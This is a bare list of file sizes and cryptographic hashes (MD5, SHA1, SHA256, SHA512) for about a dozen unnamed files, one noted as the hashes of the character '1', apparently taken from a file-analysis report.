SHA512: a6f7b066859f8e0dbe1fe4b8b7cdfae1cde2b7392ae7574b2b5a2194e50379d64abf6be75fcbf89d606f4b2e797ffd1a46ceeb7bd1d72810367c86db6819d50f

Filesize: 1KB
MD5: c3cb16747ff61276392b488109c5260c
SHA1: 5b9ed30601b2f7651523f46178b3f4cb1c3f6800
SHA256: cca16e6157891aeb91befe39444e9e1d5b423085138ba48bfa7acdc7a5883f28
SHA512: ef5ce9d067144855f36e1d0c6ad604d5d2d29d9729d58d7fc872788b2bc54cd3729b049158daa6442fe388eeae540ab50e38004a57d3a7e8df35fc84f3375079

Filesize: 1KB
MD5: d9dab0cd34fbe500203c74e7c45dbbd0
SHA1: 60a003268e31b33334ac07bcf07db68bc7c13faf
SHA256: 036de6eb68e08828b88bbbe571fdef13750c1086a4bf51c589da8fdfcaa3ed17
SHA512: e08c594dee4ba4c3397b7de9d24416f25d6ff0943b3fbd27905a0e9e0a2e32522ad7edff53ba9b9c7c697a4c84e1d858dde45efa8d1e32db132153b1ddf0884e

Filesize: 1KB
MD5: 8993d686f3d769cc5bfb6527cab46d24
SHA1: 1b8c78ebc6f3d8d034a38f8596b8d5176550bea8
SHA256: cad5244c55c634b5735c6d8d6a216b3e8e026d28f64d7cd6660326e001007d6c
SHA512: 3bd8646642be0561b115fab9eb58448b9dffd95ec9477eaede4e29cf9f1ad86be7671daaae6dd2f801bdaec0c1388dcdf25ee806acc86f35bfb215e230b1582c

Filesize: 2KB
MD5: 590f88f1402d594e3c1112bf2e4a8b85
SHA1: 409c831b45408bd4316335e61fc2890779c40c32
SHA256: 615f39840c799a02d0be922a434a6559d4be0c4ebc110dcdb5028e4a784d66f4
SHA512: 205789a5fd3d1d7edf6a94ca831e25c5a3bc71b147b9bfc7bc971389d83652ec2b9e6e004bd460207fba6cb4bfba66b032b3f12979f33ed2b6965d5df17afb45

Filesize: 1B (these are the hashes of the single ASCII character "1")
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Filesize: 728B
MD5: adcea074e6d3724782556be754ab1d24
SHA1: f67393de938a2145817cd4baa62a93b5156fa7de
SHA256: 91a6cf0c45094628e4612f9fd837e6e09bab2b9c19e4314f1b5bf98fa6c607ac
SHA512: 54b53d931054dd6a360c8cf24b33a8f53ca455156a11da8c8e47c45d7d13ce660ee3acd7608b11209765df87b58c74eefe44b6326a3b920ff5e0192bfe75dde2

Filesize: 4KB
MD5: b755a84305c5e86277dbdb697768f70f
SHA1: b1bfed42034d1f8cbcfa66daa3ccc78cd8ee8c68
SHA256: 58c52a5f5e0128cd62dbdcbf933e3f64c13f877e4ec5255f8991c3dac6a0f7b3
SHA512: 3428b9e4c7cb2015de8d7357c15bc18b6e6dd6c1230968f8fa9720f4bf7e54f6b3f00f85e1a30fecbd7d7022b6fed67f79dee4e288f379f2e78d1b987d0b7503

Filesize: 10.7MB
MD5: e3e481c4d8c2d4632c8ea7086ee004d1
SHA1: 24ea269d62c1141b6f7e85ec359e8a28fea32fcc
SHA256: 36e71ee5cba0ca51af79c568fafebcddff71bb95138ca1f4942fc492d498e88a
SHA512: 2f0adefe7fad5bf79c63e875b1dd8e1a7532e03c13c99e767cdce2cde7dff335246ac2c227aba5cfbabcc2c46d28f68cc09800f63a39bd4fa9819075f2278f56

Filesize: 130B
MD5: d1111fbbaef28413de4a0a64e0d54f2d
SHA1: 5bbadc5c5d504dcba5509d34986125e8446e3830
SHA256: beed3a3f6edc1e1b73a3cafa55f16ba61d56c87b7506ae9c33eb630bcbaa3a01
SHA512: 1196efb8579efc91105000afaac0b6c14f386aa29a64ddd88f9a2d6a980bd2eb8dd6a2e78457eb9e5614f9492d0e75342f01293c1a8341b153357f2d64c64af0

Filesize: 1.4MB
MD5: 56192831a7f808874207ba593f464415
SHA1: e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA256: 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512: c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

Filesize: 154KB
MD5: d9ca8449dee2f77b3c217c5de0bbc450
SHA1: d22696acbe8e428f6e70168aff12d202e7e2b9c5
SHA256: a1ab97d58849bd1baa44140340e5800590bbccc2f022e7bcea7d6837038fc0f2
SHA512: cc480c1fc8647ceafd70c2f58e397de7c17b1e8b699e9cc3ce6ff81970ab4301f7a54a64abdb5eab37288d24c1682410d18a20d795683f50491042ff5aca91aa